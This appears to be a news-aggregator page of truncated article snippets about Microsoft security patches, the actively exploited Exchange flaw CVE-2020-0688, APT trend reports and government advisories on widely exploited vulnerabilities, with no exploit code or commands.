September sees a bundle of 129 CVE-listed flaws patched by Microsoft. The vast majority of those, 105 in total, are classified as 'important' risks. Another 23 are considered critical bugs, and one is listed as moderate.
None of the bugs have public exploit code or in-the-wild attacks yet.
Of the nearly two-dozen critical patches, Zero Day Initiative's Dustin Childs says ...

APT trends report Q2 2020
Securelist • GReAT • 29 Jul 2020

For more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.
This is our latest installment,...

Microsoft: Attackers increasingly exploit Exchange servers
BleepingComputer • Sergiu Gatlan • 24 Jun 2020

Microsoft's Defender ATP Research Team today issued guidance on how to defend against attacks targeting Exchange servers by blocking malicious activity identified with the help of behavior-based detection.
The Microsoft researchers based their analysis on multiple campaigns of Exchange attacks investigated during early April, which showed how the malicious actors were deploying web shells on on-premises Exchange servers.
Multiple fileless techniques were also used as part of these attacks,...

Serious Exchange Flaw Still Plagues 350K Servers
Threatpost • Lindsey O'Donnell • 07 Apr 2020

Over 80 percent of exposed Exchange servers are still vulnerable to a severe vulnerability – nearly two months after the flaw was patched, and after researchers warned that multiple threat groups were exploiting it.
The vulnerability in question (CVE-2020-0688) exists in the control panel of Exchange, Microsoft’s mail server and calendaring server. The flaw, which stems from the server failing to properly create unique keys at install time, opens servers up to authenticated attacker...

80% of all exposed Exchange servers still unpatched for critical flaw
BleepingComputer • Sergiu Gatlan • 06 Apr 2020

Over 350,000 of all Microsoft Exchange servers currently exposed on the Internet haven't yet been patched against the CVE-2020-0688 post-auth remote code execution vulnerability affecting all supported Microsoft Exchange Server versions.
This security flaw is present in the Exchange Control Panel (ECP) component —on by default— and it allows attackers to take over vulnerable Microsoft Exchange servers using any previously stolen valid email credentials.
Microsoft patched th...

Microsoft Exchange Server Flaw Exploited in APT Attacks
Threatpost • Lindsey O'Donnell • 09 Mar 2020

Multiple threat groups are actively exploiting a vulnerability in Microsoft Exchange servers, researchers warn. If left unpatched, the flaw allows authenticated attackers to execute code remotely with system privileges.
The vulnerability in question (CVE-2020-0688) exists in the control panel of Exchange, Microsoft’s mail server and calendaring server, and was fixed as part of Microsoft’s February Patch Tuesday updates. However, researchers in a Friday advisory said that unpatched ser...

NSA Warns About Microsoft Exchange Flaw as Attacks Start
BleepingComputer • Sergiu Gatlan • 09 Mar 2020

The U.S. National Security Agency (NSA) warned about a post-auth remote code execution vulnerability in all supported Microsoft Exchange Server servers via a tweet published on the agency's Twitter account.
NSA's tweet
followers to patch the CVE-2020-0688 vulnerability which would enable potential attackers to execute commands on vulnerable Microsoft Exchange servers using email credentials.
Microsoft patched this RCE security flaw as part of the 
and tagged it wi...

Hackers Scanning for Vulnerable Microsoft Exchange Servers, Patch Now!
BleepingComputer • Sergiu Gatlan • 26 Feb 2020

Attackers are actively scanning the Internet for Microsoft Exchange Servers vulnerable to the CVE-2020-0688 remote code execution vulnerability
two weeks ago.
All Exchange Server versions up to the last released patch are exposed to potential attacks following these ongoing scans, including those currently out of support even though
doesn't explicitly list them.
The flaw is present in the Exchange Control Panel (ECP) component and it is caused by Exchange's inability ...

If you're running Windows, I feel bad for you, son. Microsoft's got 99 problems, better fix each one
The Register • Shaun Nichols in San Francisco • 11 Feb 2020

Meanwhile, we're still squashing bugs in Adobe Flash Player... plus stuff from Intel and SAP

Patch Tuesday It's going to be a busy month for IT administrators as Microsoft, Intel, Adobe, and SAP have teamed up to deliver a bumper crop of security fixes for Patch Tuesday.
Microsoft had one of its largest patch bundles in recent memory, as the Windows giant released fixes for 99 CVE-listed vulnerabilities.
These included CVE-2020-0674, a remote code execution flaw in Internet Explorer's Trident rendering engine that is already being exploited in the wild. This hole would typic...

Microsoft Addresses Active Attacks, Air-Gap Danger with 99 Patches
Threatpost • Tara Seals • 11 Feb 2020

Microsoft has issued one of its largest Patch Tuesday updates for the shortest month of the year, addressing 99 security vulnerabilities across a range of products. Twelve of the bugs are listed as critical – and the rest are rated as being important.
The update includes a patch for the zero-day memory-corruption vulnerability disclosed in late January that’s under active attack. The bug tracked as CVE-2020-0674 is a critical flaw for most Internet Explorer versions, allowing remote co...

US govt: China-sponsored hackers targeting Exchange, Citrix, F5 flaws
BleepingComputer • Lawrence Abrams • 01 Jan 1970

Today, the US government issued an advisory on China-sponsored hackers attacking government agencies through vulnerabilities in Microsoft Exchange, Citrix, Pulse, and F5 devices and servers.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is an independent federal agency that protects against and coordinates responses to threats from private and state-sponsored hackers targeting United States interests.
In a new advisory today, CISA and the FBI warn that Chinese MSS-...

Five Eyes nations reveal 2021's fifteen most-exploited flaws
The Register • Jessica Lyons Hardcastle • 01 Jan 1970

Malicious cyber actors go after 2021's biggest misses, spend less time on the classics

Security flaws in Log4j, Microsoft Exchange, and Atlassian's workspace collaboration software were among the bugs most frequently exploited by "malicious cyber actors" in 2021, according to a joint advisory by the Five Eyes nations' cybersecurity and law enforcement agencies.
It's worth noting that 11 of the 15 flaws on the list were disclosed in 2021, as previous years' lists often found miscreants exploiting the older vulns for which patches had been available for years.
Of course...
